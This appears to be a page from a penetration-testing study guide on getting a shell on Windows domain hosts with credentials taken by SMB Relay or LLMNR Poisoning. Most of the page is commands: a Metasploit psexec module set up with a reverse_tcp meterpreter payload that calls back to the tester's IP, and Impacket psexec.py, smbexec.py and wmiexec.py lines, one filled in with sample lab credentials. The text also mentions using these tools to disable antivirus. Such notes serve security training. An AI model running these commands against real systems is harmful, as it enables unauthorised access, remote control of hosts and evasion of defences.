Gaining Shell Access

Once use the hashes from SMB Relay or LLMNR Poisoning we should have some creds we can sue to gain shell access
Spin up metasploit

# Start metasploit 
msfconsole

# Use psexec exploit 
search psexec 

# Look for windows/smb/psexec
# Set options 
set rhosts TARGET_IP
set smbdomain TARGET_DOMAIN
set smbpass USER_PASS
set smbuser TARGET_USER
set payload windows/x64/meterpreter/reverse_tcp
set lhost YOUR_IP

Another option is to user psexec.py

# Run psexec.py 
psexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP

# Example 
psexec.py marvel.local/fcastle:Password1@10.0.2.4

Other options
- These are good to sneak around, get information, disable things like AV, etc.

smbexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP

wmiexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP

PreviousInitial Attack Vectors NextLLMNR Poisoning

Last updated 11 months ago